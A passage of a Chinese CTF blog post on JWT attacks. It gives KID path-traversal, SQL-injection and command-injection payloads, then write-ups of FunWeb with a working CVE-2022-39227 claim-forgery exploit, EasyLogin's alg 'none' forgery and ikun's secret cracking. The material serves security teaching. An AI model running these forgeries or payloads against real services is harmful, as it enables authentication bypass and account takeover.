<h4 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h4><p>由于KID通常用于从文件系统中检索密钥文件，因此，如果在使用前不清理KID，文件系统可能会遭到目录遍历攻击。这样，攻击者便能够在文件系统中指定任意文件作为认证的密钥。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-attr">&quot;kid&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;../../public/css/main.css&quot;</span>   <span class="hljs-comment">//使用公共文件main.css验证token</span><br></code></pre></td></tr></table></figure>

<p>这样我们就可以强行设定应用程序使用公开可用文件作为密钥，并用该文件给HMAC加密的token签名。</p>
<h4 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h4><p>KID也可以用于在数据库中检索密钥。在该情况下，攻击者很可能会利用SQL注入来绕过JWT安全机制。<br>如果可以在KID参数上进行SQL注入，攻击者便能使用该注入返回任意值。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-attr">&quot;kid&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;aaaaaaa&#x27; UNION SELECT &#x27;key&#x27;;--&quot;</span>  <span class="hljs-comment">//Use a string &quot;key&quot; Authentication token</span><br></code></pre></td></tr></table></figure>

<p>上面这个注入会导致应用程序返回字符串“ key”,</p>
<p>因为数据库中不存在名为”aaaaaaa”的密钥，然后使用字符串“ key”作为密钥来认证token。</p>
<h4 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h4><p>有时，将KID参数直接传到不安全的文件读取操作可能会让一些命令注入代码流中。<br>一些函数就能给此类型攻击可乘之机，比如Ruby open（）。攻击者只需在输入的KID文件名后面添加命令，即可执行系统命令：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-string">&quot;key_file&quot;</span> | whoami;<br></code></pre></td></tr></table></figure>

<p>类似情况还有很多，这只是其中一个例子。理论上，每当应用程序将未审查的头部文件参数传递给类似<code>system()</code>，<code>exec()</code>的函数时，都会产生此种漏洞。</p>
<h3 id="其他头部参数操控"><a href="#其他头部参数操控" class="headerlink" title="其他头部参数操控"></a>其他头部参数操控</h3><p>除KID外，JWT标准还能让开发人员通过URL指定密钥。</p>
<h4 id="JKU头部参数"><a href="#JKU头部参数" class="headerlink" title="JKU头部参数"></a>JKU头部参数</h4><p>JKU全称是“JWKSet URL”，它是头部的一个可选字段，用于指定链接到一组加密token密钥的URL。若允许使用该字段且不设置限定条件，攻击者就能托管自己的密钥文件，并指定应用程序，用它来认证token。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json">jku URL-&gt;包含JWK集的文件-&gt;用于验证令牌的JWK<br></code></pre></td></tr></table></figure>

<h4 id="操纵X5U，X5C-URL"><a href="#操纵X5U，X5C-URL" class="headerlink" title="操纵X5U，X5C URL"></a>操纵X5U，X5C URL</h4><p>同JKU或JWK头部类似，x5u和x5c头部参数允许攻击者用于验证Token的公钥证书或证书链。x5u以URI形式指定信息，而x5c允许将证书值嵌入token中。</p>
<h2 id="JWTtool"><a href="#JWTtool" class="headerlink" title="JWTtool"></a>JWTtool</h2><p>如果您需要对您使用JWT的网站进行安全测试，这里也有对应的工具，比如JWTtool，上述常见的JWT漏洞都可以使用该工具进行利用：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ticarpi/jwt_tool">https://github.com/ticarpi/jwt_tool</a></p>
<p>同时你也能在该项目的Wiki网站上获取更多jwt的知识：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ticarpi/jwt_tool/wiki">https://github.com/ticarpi/jwt_tool/wiki</a></p>
<h2 id="2022-XiangyunCup-FunWeb"><a href="#2022-XiangyunCup-FunWeb" class="headerlink" title="2022 XiangyunCup FunWeb"></a>2022 XiangyunCup FunWeb</h2><p>我们来看看2022年祥云杯的Web题——FunWeb。</p>
<p>这道题并没有考察传统的JWT漏洞 而是选择一个比较新的 1day (CVE-2022-39227 )来出题。</p>
<p>经典的开局一个登录框，登录页面抓包后先跑了admin的弱口令，当然现在的题一般没这么容易，并没有结果。</p>
<p>老老实实注册进去，有两个可以点的，一个是查看flag，一个是查看成绩，点击之后发现都需要admin身份，所以抓包分析看到了一下，发现<code>xxx.yyy.zzz</code>的token结构，下意识就去jwt.io解码了：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667845643643-eebf4026-3cc5-4319-a90a-583b1cdc0edf.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>从payload可以判断大概这里就是突破点。</p>
<p>当然面对这样一道JWT的题目，常规攻击手段肯定是首选，不过这样的题目，如果常规打不下来，就得考虑在github上面找commit了。</p>
<p>所以在一天常规攻击无果后，于是开始找最近有关jwt的day，然后队里另外一位师傅翻到了python jwt的1day，也就是CVE-2022-39227</p>
<p><a target="_blank" rel="noopener" href="https://github.com/davedoesdev/python-jwt/commit/88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9">https://github.com/davedoesdev/python-jwt/commit/88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9</a></p>
<p>拉到最后我们可以看到作者在test中提供了漏洞POC：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&quot;&quot;&quot; Test claim forgery vulnerability fix &quot;&quot;&quot;</span><br><span class="hljs-keyword">from</span> datetime <span class="hljs-keyword">import</span> timedelta<br><span class="hljs-keyword">from</span> json <span class="hljs-keyword">import</span> loads, dumps<br><span class="hljs-keyword">from</span> test.common <span class="hljs-keyword">import</span> generated_keys<br><span class="hljs-keyword">from</span> test <span class="hljs-keyword">import</span> python_jwt <span class="hljs-keyword">as</span> jwt<br><span class="hljs-keyword">from</span> pyvows <span class="hljs-keyword">import</span> Vows, expect<br><span class="hljs-keyword">from</span> jwcrypto.common <span class="hljs-keyword">import</span> base64url_decode, base64url_encode<br><br><span class="hljs-meta">@Vows.batch</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">ForgedClaims</span>(Vows.Context):<br>    <span class="hljs-string">&quot;&quot;&quot; Check we get an error when payload is forged using mix of compact and JSON formats &quot;&quot;&quot;</span><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">topic</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-string">&quot;&quot;&quot; Generate token &quot;&quot;&quot;</span><br>        payload = &#123;<span class="hljs-string">&#x27;sub&#x27;</span>: <span class="hljs-string">&#x27;alice&#x27;</span>&#125;<br>        <span class="hljs-keyword">return</span> jwt.generate_jwt(payload, generated_keys[<span class="hljs-string">&#x27;PS256&#x27;</span>], <span class="hljs-string">&#x27;PS256&#x27;</span>, timedelta(minutes=<span class="hljs-number">60</span>))<br><br>    <span class="hljs-keyword">class</span> <span class="hljs-title class_">PolyglotToken</span>(Vows.Context):<br>        <span class="hljs-string">&quot;&quot;&quot; Make a forged token &quot;&quot;&quot;</span><br>        <span class="hljs-keyword">def</span> <span class="hljs-title function_">topic</span>(<span class="hljs-params">self, topic</span>):<br>            <span class="hljs-string">&quot;&quot;&quot; Use mix of JSON and compact format to insert forged claims including long expiration &quot;&quot;&quot;</span><br>            [header, payload, signature] = topic.split(<span class="hljs-string">&#x27;.&#x27;</span>)<br>            parsed_payload = loads(base64url_decode(payload))<br>            parsed_payload[<span class="hljs-string">&#x27;sub&#x27;</span>] = <span class="hljs-string">&#x27;bob&#x27;</span><br>            parsed_payload[<span class="hljs-string">&#x27;exp&#x27;</span>] = <span class="hljs-number">2000000000</span><br>            fake_payload = base64url_encode((dumps(parsed_payload, separators=(<span class="hljs-string">&#x27;,&#x27;</span>, <span class="hljs-string">&#x27;:&#x27;</span>))))<br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&#123;&quot;  &#x27;</span> + header + <span class="hljs-string">&#x27;.&#x27;</span> + fake_payload + <span class="hljs-string">&#x27;.&quot;:&quot;&quot;,&quot;protected&quot;:&quot;&#x27;</span> + header + <span class="hljs-string">&#x27;&quot;, &quot;payload&quot;:&quot;&#x27;</span> + payload + <span class="hljs-string">&#x27;&quot;,&quot;signature&quot;:&quot;&#x27;</span> + signature + <span class="hljs-string">&#x27;&quot;&#125;&#x27;</span><br><br>        <span class="hljs-keyword">class</span> <span class="hljs-title class_">Verify</span>(Vows.Context):<br>            <span class="hljs-string">&quot;&quot;&quot; Check the forged token fails to verify &quot;&quot;&quot;</span><br><span class="hljs-meta">            @Vows.capture_error</span><br>            <span class="hljs-keyword">def</span> <span class="hljs-title function_">topic</span>(<span class="hljs-params">self, topic</span>):<br>                <span class="hljs-string">&quot;&quot;&quot; Verify the forged token &quot;&quot;&quot;</span><br>                <span class="hljs-keyword">return</span> jwt.verify_jwt(topic, generated_keys[<span class="hljs-string">&#x27;PS256&#x27;</span>], [<span class="hljs-string">&#x27;PS256&#x27;</span>])<br><br>            <span class="hljs-keyword">def</span> <span class="hljs-title function_">token_should_not_verify</span>(<span class="hljs-params">self, r</span>):<br>                <span class="hljs-string">&quot;&quot;&quot; Check the token doesn&#x27;t verify due to mixed format being detected &quot;&quot;&quot;</span><br>                expect(r).to_be_an_error()<br>                expect(<span class="hljs-built_in">str</span>(r)).to_equal(<span class="hljs-string">&#x27;invalid JWT format&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>注意这一点注释：<code>&quot;Use mix of JSON and compact format to insert forged claims including long expiration&quot;</code>可以得知，这个漏洞的本质就是利用 json格式的注⼊  </p>
<p>如果稍加改造，我们就可以获得一个EXP：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> datetime <span class="hljs-keyword">import</span> timedelta<br><span class="hljs-keyword">from</span> json <span class="hljs-keyword">import</span> loads, dumps<br><span class="hljs-keyword">from</span> common <span class="hljs-keyword">import</span> generated_keys<br><span class="hljs-keyword">import</span> python_jwt <span class="hljs-keyword">as</span> jwt<br><span class="hljs-keyword">from</span> pyvows <span class="hljs-keyword">import</span> Vows, expect<br><span class="hljs-keyword">from</span> jwcrypto.common <span class="hljs-keyword">import</span> base64url_decode, base64url_encode<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">topic</span>(<span class="hljs-params">topic</span>):<br>    <span class="hljs-string">&quot;&quot;&quot; Use mix of JSON and compact format to insert forged claims including long expiration &quot;&quot;&quot;</span><br>    [header, payload, signature] = topic.split(<span class="hljs-string">&#x27;.&#x27;</span>)<br>    parsed_payload = loads(base64url_decode(payload))<br>    parsed_payload[<span class="hljs-string">&#x27;is_admin&#x27;</span>] = <span class="hljs-number">1</span><br>    parsed_payload[<span class="hljs-string">&#x27;exp&#x27;</span>] = <span class="hljs-number">2000000000</span><br>    fake_payload = base64url_encode(<br>        (dumps(parsed_payload, separators=(<span class="hljs-string">&#x27;,&#x27;</span>, <span class="hljs-string">&#x27;:&#x27;</span>))))<br>    <span class="hljs-comment"># print (header+ &#x27;.&#x27; +fake_payload+ &#x27;.&#x27; +signature)</span><br>    <span class="hljs-comment"># print (header+ &#x27;.&#x27; + payload+ &#x27;.&#x27; +signature)</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&#123;&quot;  &#x27;</span> + header + <span class="hljs-string">&#x27;.&#x27;</span> + fake_payload + <span class="hljs-string">&#x27;.&quot;:&quot;&quot;,&quot;protected&quot;:&quot;&#x27;</span> + header + <span class="hljs-string">&#x27;&quot;, &quot;payload&quot;:&quot;&#x27;</span> + payload + <span class="hljs-string">&#x27;&quot;,&quot;signature&quot;:&quot;&#x27;</span> + signature + <span class="hljs-string">&#x27;&quot;&#125;&#x27;</span><br><br>originaltoken = <span class="hljs-string">&#x27;&#x27;&#x27;eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxNDE5MTUsImlhdCI6MTY2NzE0MTYxNSwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiI1dnBYUmNpck1semxNUG54MHNTWDd3IiwibmJmIjoxNjY3MTQxNjE1LCJwYXNzd29yZCI6ImY2MWQiLCJ1c2VybmFtZSI6ImY2MWQifQ.cqQ2RVegORBfB_fo33birEJs8Tw8WDM7wIYwfXz_BpW6gQG99cl-DePmP6iNx5Mf0aCwDcuqS-wOXjis7JVmhpf8dmdYkP_gLvYMULpPcFX03j70Cu3bhMWSAGUMjt_IFGQ1-xfwYp1LI9SWAlBM5wDPCh-gi96abRDvhRW-c-6mFul2us_XKl7kyceT2fY2ABrcJRSKA91kLm3ZOcD4FA6yuHMyKVfmN9RqPtzvvUVutniv03XPFTGIzHudzswRc0b3nN-XMsnyi_Ca62T8CVb1MMEDPVlDM7CDJmJXGfoNimkrOhPi22SItpv4tO7u-bbene3PpvW1Lv7UEQeDBg&#x27;&#x27;&#x27;</span><br><br>topic = topic(originaltoken)<br><span class="hljs-built_in">print</span>(topic)<br></code></pre></td></tr></table></figure>

<p>利用生成的json当作token传参即可绕过：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667847065180-579c6d06-711c-4c2b-acdc-8bc854a46812.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>JWT的部分其实到这就结束了，后面如何拿flag就涉及到grahql的一个注入了，如果有时间，我会在下一篇文章总结一些SQL注入的知识。</p>
<h2 id="From-FunWeb-to-CVE-2022-39227-vulnerability-analysis"><a href="#From-FunWeb-to-CVE-2022-39227-vulnerability-analysis" class="headerlink" title="From FunWeb to CVE-2022-39227 vulnerability analysis"></a>From FunWeb to CVE-2022-39227 vulnerability analysis</h2><p>本来还想着要分析，最近时间不是很够，敲好J1an师傅直接把文档炫我嘴里了（，</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667847767154-29fdc9b4-817c-4e39-9ba6-80335b838f62.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667847750329-8f0cc9f5-9ae8-46d8-bad9-555ee2173e64.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>那这里原理分析我就直接使用J1an师傅的文章啦：</p>
<p>原文地址：<a target="_blank" rel="noopener" href="https://forum.butian.net/share/1990">https://forum.butian.net/share/1990</a> 过审了所以添上了ww</p>
<p><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2022/pdf/21803058/1667847629252-562bc55d-8161-4c32-a5ff-1cad49da7960.pdf">奇安信攻防社区-CVE-2022-39227漏洞分析.pdf</a></p>
<h2 id="Other-Jwt-topics"><a href="#Other-Jwt-topics" class="headerlink" title="Other Jwt topics"></a>Other Jwt topics</h2><h3 id="HFCTF2020-EasyLogin"><a href="#HFCTF2020-EasyLogin" class="headerlink" title="[HFCTF2020]EasyLogin"></a>[HFCTF2020]EasyLogin</h3><p>该WriteUp来源：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/0f76e1c69e33">https://www.jianshu.com/p/0f76e1c69e33</a></p>
<h4 id="复现环境："><a href="#复现环境：" class="headerlink" title="复现环境："></a>复现环境：</h4><p>[<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[HFCTF2020\]EasyLogin](https://links.jianshu.com/go?to=https%3A%2F%2Fbuuoj.cn%2Fchallenges%23%5BHFCTF2020%5DEasyLogin)">https://buuoj.cn/challenges#[HFCTF2020\]EasyLogin](https://links.jianshu.com/go?to=https%3A%2F%2Fbuuoj.cn%2Fchallenges%23%5BHFCTF2020%5DEasyLogin)</a><br><a target="_blank" rel="noopener" href="https://links.jianshu.com/go?to=https://www.ctfhub.com/%23/challenge">https://www.ctfhub.com/#/challenge</a></p>
<h4 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h4><p>运行环境发现是一个登录页面，直接登录显示<code>Cannot read property &#39;split&#39; of undefined</code>，<strong>需要先注册再登陆。</strong><br>使用注册的普通账号登录，发现<code>get flag</code>按钮，点击提示<code>permission denied</code>，无权限，那么此题的方向应该是伪造成一个高权限账户。<br>截取登录包，发现两处可疑<code>authorization</code>校验字段，<code>Cookie</code>也存在<code>sses.aok</code>的校验</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667899778186-b6a9fa71-efbe-4f8d-a1b8-5d5e096f4dca.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到<code>xxx.yyy.zzz</code>的结构，解码可知为jwt</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667899843564-133b73ed-452e-47eb-8a29-2ad42fbaaf93.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>通过查看源码，发现&#x2F;static&#x2F;js&#x2F;app.js 页面存在提示</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">/**<br> *  或许该用 koa-static 来处理静态文件<br> *  路径该怎么配置？不管了先填个根目录XD<br> */<br></code></pre></td></tr></table></figure>

<p><strong>koa-static 错误配置的源码泄露</strong></p>
<p>说明 <code>app.js</code> 是直接静态映射到程序根目录的，直接访问根目录的该文件可直接看到源码</p>
<p>继续分析根目录的<code>app.js</code>，发现代码引用了两个当前目录的文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">const rest = require(<span class="hljs-string">&#x27;./rest&#x27;</span>);<br>const controller = require(<span class="hljs-string">&#x27;./controller&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>说明存在rest.js和controller.js文件</p>
<p>访问<code>rest.js</code>发现同样一个路径前缀 api</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">const pathPrefix = <span class="hljs-string">&#x27;/api/&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>访问<code>controller.js</code>看到下面的代码</p>
<p>遍历在controllers文件夹下的以.js结尾的文件，并且引入文件添加在router中，推断controllers文件夹下存在一个api.js文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">function addControllers(router, <span class="hljs-built_in">dir</span>) &#123;<br>    fs.readdirSync(__dirname + <span class="hljs-string">&#x27;/&#x27;</span> + <span class="hljs-built_in">dir</span>).<span class="hljs-built_in">filter</span>(f =&gt; &#123;<br>        <span class="hljs-keyword">return</span> f.endsWith(<span class="hljs-string">&#x27;.js&#x27;</span>);<br>    &#125;).forEach(f =&gt; &#123;<br>        const mapping = require(__dirname + <span class="hljs-string">&#x27;/&#x27;</span> + <span class="hljs-built_in">dir</span> + <span class="hljs-string">&#x27;/&#x27;</span> + f);<br>        addMapping(router, mapping);<br>    &#125;);<br>&#125;<br><br>module.exports = (<span class="hljs-built_in">dir</span>) =&gt; &#123;<br>    const controllers_dir = <span class="hljs-built_in">dir</span> || <span class="hljs-string">&#x27;controllers&#x27;</span>;<br>    const router = require(<span class="hljs-string">&#x27;koa-router&#x27;</span>)();<br>    addControllers(router, controllers_dir);<br>    <span class="hljs-keyword">return</span> router.routes();<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>访问<code>/controllers/api.js</code>前端几个能看到的功能接口逻辑都在了，分析登录和注册接口</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 注册：</span><br><br>const secret = crypto.randomBytes(<span class="hljs-number">18</span>).toString(<span class="hljs-string">&#x27;hex&#x27;</span>);<br><br>const secretid = <span class="hljs-keyword">global</span>.secrets.length;<br><br><span class="hljs-keyword">global</span>.secrets.push(secret)<br><br>const token = jwt.sign(&#123;secretid, username, password&#125;, secret, &#123;algorithm: <span class="hljs-string">&#x27;HS256&#x27;</span>&#125;);<br><br><br><span class="hljs-comment"># 登录：</span><br><br>const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;<br><br>const sid = JSON.parse(Buffer.<span class="hljs-keyword">from</span>(token.split(<span class="hljs-string">&#x27;.&#x27;</span>)[<span class="hljs-number">1</span>], <span class="hljs-string">&#x27;base64&#x27;</span>).toString()).secretid;<br><br>console.log(sid)<br><br><span class="hljs-keyword">if</span>(sid === undefined || sid === null || !(sid &lt; <span class="hljs-keyword">global</span>.secrets.length &amp;&amp; sid &gt;= <span class="hljs-number">0</span>)) &#123;     <br>    throw new APIError(<span class="hljs-string">&#x27;login error&#x27;</span>, <span class="hljs-string">&#x27;no such secret id&#x27;</span>);<br>&#125;<br><br>const secret = <span class="hljs-keyword">global</span>.secrets[sid];<br><br>const user = jwt.verify(token, secret, &#123;algorithm: <span class="hljs-string">&#x27;HS256&#x27;</span>&#125;);<br></code></pre></td></tr></table></figure>

<p>我们看到secretid值校验，要求 sid 不能为 undefined，null，并且必须在全局变量 secrets 数组的长度和 0 之间。JavaScript 是一门弱类型语言，可以通过空数组与数字比较永远为真或是小数来绕过，而这个题利用的是 将加密方式改为’none’ 的方法，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">print</span>(jwt.encode(&#123;<span class="hljs-string">&quot;secretid&quot;</span>:<span class="hljs-number">0.1</span>,<span class="hljs-string">&quot;username&quot;</span>:<span class="hljs-string">&quot;admin&quot;</span>,<span class="hljs-string">&quot;password&quot;</span>:<span class="hljs-string">&quot;admin&quot;</span>&#125;,algorithm=<span class="hljs-string">&quot;none&quot;</span>,key=<span class="hljs-string">&quot;&quot;</span>).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br></code></pre></td></tr></table></figure>

<p>把生成的值替换authorization的值就通过验证了</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667900973813-aeafc668-6cc6-4b9c-b463-3d30067a05db.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>登入之后点击get flag，权限足够，获得flag</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667900984656-9ad6c80f-1f9b-4476-b745-accfd26a5c2d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="CISCN-2019-华北赛区-Web-ikun"><a href="#CISCN-2019-华北赛区-Web-ikun" class="headerlink" title="CISCN 2019 华北赛区 Web - ikun"></a>CISCN 2019 华北赛区 Web - ikun</h3><h4 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h4><p><a target="_blank" rel="noopener" href="https://buuoj.cn/challenges">https://buuoj.cn/challenges</a></p>
<h4 id="题解-1"><a href="#题解-1" class="headerlink" title="题解"></a>题解</h4><p>当然这道题还涉及逻辑漏洞和python反序列化，我们在这只提一下JWT部分，详细的WP师傅们可以在网上找到。</p>
<p>&#x2F;b1g_m4mber这个页面，提示只允许admin访问</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667904382380-0852286f-3e43-4392-a634-d2e06fccb725.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>既然提示要admin，那基本上跟cookie有关，查看一下cookie，发现是JWT</p>
<p>解码可得：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667904433899-179df22b-189f-4163-9fdf-0405bab08f04.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>而这道题对于jwt的解法是爆破密钥，我们用到一个叫<a target="_blank" rel="noopener" href="https://github.com/brendan-rius/c-jwt-cracker">jwt-cracker</a>的工具来爆破密钥。</p>
<p>当然 之前提到的 JWT tool 也支持密钥爆破。</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667904553790-eab830ae-f17a-4a29-9452-529e1bc6ed91.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>爆破出来密钥为1Kun，修改用户名为admin，修改token重放：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667904579739-cdd029cb-ae8a-441e-8526-fa78c736ab21.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>接下来就是python反序列化了：</p>
<p><img src="https://nssctf.wdf.ink//img/WDTJ/1667904603214-9d2949a7-2a36-4224-b800-b6422ec42084.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="End"><a href="#End" class="headerlink" title="End"></a>End</h2><ul>
<li>Tool:</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/ticarpi/jwt_tool">https://github.com/ticarpi/jwt_tool</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/brendan-rius/c-jwt-cracker">https://github.com/brendan-rius/c-jwt-cracker</a></p>
<ul>
<li>Reference</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/ticarpi/jwt_tool/wiki">https://github.com/ticarpi/jwt_tool/wiki</a></p>
<p><a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/377.html">https://saucer-man.com/information_security/377.html</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9376#toc-0">https://xz.aliyun.com/t/9376#toc-0</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Web/">#Web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>From Jwt To The XiangYunCup FunWeb</div>
      <div>https://blog.probius.xyz/2022/11/20/From-Jwt-To-The-XiangYunCup-FunWeb/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Probius</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年11月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/29/Build-Your-Remote-Linux-Docker/" title="Build-Your-Remote-Linux-Docker">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Build-Your-Remote-Linux-Docker</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/twikoo/1.6.8/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"https://coment.probius.xyz/","region":null,"path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              var imgSelector = '#twikoo .tk-content img:not(.tk-owo-emotion)';
              Fluid.plugins.imageCaption(imgSelector);
              Fluid.plugins.fancyBox(imgSelector);
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
